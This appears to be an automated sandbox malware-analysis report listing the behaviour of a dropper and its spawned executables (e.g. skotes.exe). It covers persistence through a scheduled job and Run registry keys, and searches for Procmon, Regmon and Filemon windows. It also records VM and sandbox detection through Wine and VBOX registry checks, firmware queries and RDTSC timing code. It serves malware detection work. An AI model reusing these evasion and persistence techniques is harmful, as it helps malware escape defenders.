Source: C:\Users\user\AppData\Local\Temp\7YW0363WEKP7ULOI0QRA.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7YW0363WEKP7ULOI0QRA.exe Window searched: window name: Regmonclass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7YW0363WEKP7ULOI0QRA.exe Window searched: window name: Filemonclass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7YW0363WEKP7ULOI0QRA.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7YW0363WEKP7ULOI0QRA.exe Window searched: window name: Regmonclass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\S70TEYDWG0MIRHL2D28PBWQHSI2HDI.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\S70TEYDWG0MIRHL2D28PBWQHSI2HDI.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\S70TEYDWG0MIRHL2D28PBWQHSI2HDI.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\S70TEYDWG0MIRHL2D28PBWQHSI2HDI.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\S70TEYDWG0MIRHL2D28PBWQHSI2HDI.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: Regmonclass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: Filemonclass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: Regmonclass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe Window searched: window name: Regmonclass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe Window searched: window name: Filemonclass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002536001\7451ae0b11.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1002536001\7451ae0b11.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1002536001\7451ae0b11.exe Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\1002536001\7451ae0b11.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1002536001\7451ae0b11.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe Window searched: window name: Filemonclass
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\W7N881PI98FKFOKWDI7HCS7W.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\W7N881PI98FKFOKWDI7HCS7W.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\W7N881PI98FKFOKWDI7HCS7W.exe Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\W7N881PI98FKFOKWDI7HCS7W.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\W7N881PI98FKFOKWDI7HCS7W.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\W7N881PI98FKFOKWDI7HCS7W.exe Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\W7N881PI98FKFOKWDI7HCS7W.exe Window searched: window name: Filemonclass
Source: C:\Users\user\AppData\Local\Temp\W7N881PI98FKFOKWDI7HCS7W.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\W7N881PI98FKFOKWDI7HCS7W.exe Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\1002536001\7451ae0b11.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1002536001\7451ae0b11.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1002536001\7451ae0b11.exe Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\1002536001\7451ae0b11.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1002536001\7451ae0b11.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1002536001\7451ae0b11.exe Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\1002536001\7451ae0b11.exe Window searched: window name: Filemonclass
Source: C:\Users\user\AppData\Local\Temp\1002536001\7451ae0b11.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\DP4Z2JGIRNCYT3CKHONMY.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\DP4Z2JGIRNCYT3CKHONMY.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\DP4Z2JGIRNCYT3CKHONMY.exe Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\DP4Z2JGIRNCYT3CKHONMY.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\DP4Z2JGIRNCYT3CKHONMY.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\8EKC9XRWVAAE9N5ITBV1P67OSMSENNC.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\8EKC9XRWVAAE9N5ITBV1P67OSMSENNC.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\8EKC9XRWVAAE9N5ITBV1P67OSMSENNC.exe Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\8EKC9XRWVAAE9N5ITBV1P67OSMSENNC.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\8EKC9XRWVAAE9N5ITBV1P67OSMSENNC.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\ZVNI3QDRJUMHB5ZEQG5Z2C.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\ZVNI3QDRJUMHB5ZEQG5Z2C.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\ZVNI3QDRJUMHB5ZEQG5Z2C.exe Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\ZVNI3QDRJUMHB5ZEQG5Z2C.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\ZVNI3QDRJUMHB5ZEQG5Z2C.exe Window searched: window name: PROCMON_WINDOW_CLASS
Creates job files (autostart)
Source: C:\Users\user\AppData\Local\Temp\S70TEYDWG0MIRHL2D28PBWQHSI2HDI.exe File created: C:\Windows\Tasks\skotes.job Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 58ce8f976c.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 58ce8f976c.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 7451ae0b11.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 7451ae0b11.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 760934cb92.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 760934cb92.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run num.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run num.exe Jump to behavior
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Source: C:\Users\user\Desktop\file.exe Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate Jump to behavior
Source: C:\Users\user\Desktop\file.exe Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe Registry key monitored for changes: HKEY_CURRENT_USER_Classes
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7YW0363WEKP7ULOI0QRA.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7YW0363WEKP7ULOI0QRA.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7YW0363WEKP7ULOI0QRA.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7YW0363WEKP7ULOI0QRA.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7YW0363WEKP7ULOI0QRA.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7YW0363WEKP7ULOI0QRA.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7YW0363WEKP7ULOI0QRA.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7YW0363WEKP7ULOI0QRA.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7YW0363WEKP7ULOI0QRA.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7YW0363WEKP7ULOI0QRA.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7YW0363WEKP7ULOI0QRA.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7YW0363WEKP7ULOI0QRA.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7YW0363WEKP7ULOI0QRA.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7YW0363WEKP7ULOI0QRA.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7YW0363WEKP7ULOI0QRA.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7YW0363WEKP7ULOI0QRA.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\S70TEYDWG0MIRHL2D28PBWQHSI2HDI.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1002537001\760934cb92.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1002537001\760934cb92.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\W7N881PI98FKFOKWDI7HCS7W.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\W7N881PI98FKFOKWDI7HCS7W.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\W7N881PI98FKFOKWDI7HCS7W.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\W7N881PI98FKFOKWDI7HCS7W.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\W7N881PI98FKFOKWDI7HCS7W.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\W7N881PI98FKFOKWDI7HCS7W.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\W7N881PI98FKFOKWDI7HCS7W.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\W7N881PI98FKFOKWDI7HCS7W.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\W7N881PI98FKFOKWDI7HCS7W.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\W7N881PI98FKFOKWDI7HCS7W.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\W7N881PI98FKFOKWDI7HCS7W.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\W7N881PI98FKFOKWDI7HCS7W.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\W7N881PI98FKFOKWDI7HCS7W.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\W7N881PI98FKFOKWDI7HCS7W.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\W7N881PI98FKFOKWDI7HCS7W.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\W7N881PI98FKFOKWDI7HCS7W.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1002537001\760934cb92.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1002537001\760934cb92.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\8EKC9XRWVAAE9N5ITBV1P67OSMSENNC.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\8EKC9XRWVAAE9N5ITBV1P67OSMSENNC.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\8EKC9XRWVAAE9N5ITBV1P67OSMSENNC.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\8EKC9XRWVAAE9N5ITBV1P67OSMSENNC.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\8EKC9XRWVAAE9N5ITBV1P67OSMSENNC.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\8EKC9XRWVAAE9N5ITBV1P67OSMSENNC.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\8EKC9XRWVAAE9N5ITBV1P67OSMSENNC.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\8EKC9XRWVAAE9N5ITBV1P67OSMSENNC.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\8EKC9XRWVAAE9N5ITBV1P67OSMSENNC.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\8EKC9XRWVAAE9N5ITBV1P67OSMSENNC.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\8EKC9XRWVAAE9N5ITBV1P67OSMSENNC.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\8EKC9XRWVAAE9N5ITBV1P67OSMSENNC.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\8EKC9XRWVAAE9N5ITBV1P67OSMSENNC.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\8EKC9XRWVAAE9N5ITBV1P67OSMSENNC.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\8EKC9XRWVAAE9N5ITBV1P67OSMSENNC.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\8EKC9XRWVAAE9N5ITBV1P67OSMSENNC.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion
barindex
Query firmware table information (likely to detect VMs)
Source: C:\Users\user\Desktop\file.exe System information queried: FirmwareTableInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe System information queried: FirmwareTableInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe System information queried: FirmwareTableInformation
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Source: C:\Users\user\Desktop\file.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7YW0363WEKP7ULOI0QRA.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7YW0363WEKP7ULOI0QRA.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\S70TEYDWG0MIRHL2D28PBWQHSI2HDI.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\S70TEYDWG0MIRHL2D28PBWQHSI2HDI.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002536001\7451ae0b11.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\1002536001\7451ae0b11.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\W7N881PI98FKFOKWDI7HCS7W.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\W7N881PI98FKFOKWDI7HCS7W.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\1002536001\7451ae0b11.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\1002536001\7451ae0b11.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\DP4Z2JGIRNCYT3CKHONMY.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\DP4Z2JGIRNCYT3CKHONMY.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\8EKC9XRWVAAE9N5ITBV1P67OSMSENNC.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\8EKC9XRWVAAE9N5ITBV1P67OSMSENNC.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\ZVNI3QDRJUMHB5ZEQG5Z2C.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\ZVNI3QDRJUMHB5ZEQG5Z2C.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Tries to detect virtualization through RDTSC time measurements
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 76EB30 second address: 76EB47 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F988D0B0288h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b je 00007F988D0B0294h 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 76EB47 second address: 76EB4B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8EE458 second address: 8EE45E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8EE715 second address: 8EE71B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8F0AD8 second address: 8F0B0A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 add dword ptr [esp], 7CB81900h 0x0000000e push ebx 0x0000000f and edi, dword ptr [ebp+122D36F7h] 0x00000015 pop edi 0x00000016 push 00000003h 0x00000018 sub ch, 00000065h 0x0000001b push 00000000h 0x0000001d sub di, 0E33h 0x00000022 push 00000003h 0x00000024 movzx ecx, dx 0x00000027 push 41F81920h 0x0000002c push eax 0x0000002d push edx 0x0000002e push eax 0x0000002f push edx 0x00000030 pushad 0x00000031 popad 0x00000032 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8F0B0A second address: 8F0B10 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8F0C4C second address: 8F0C51 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
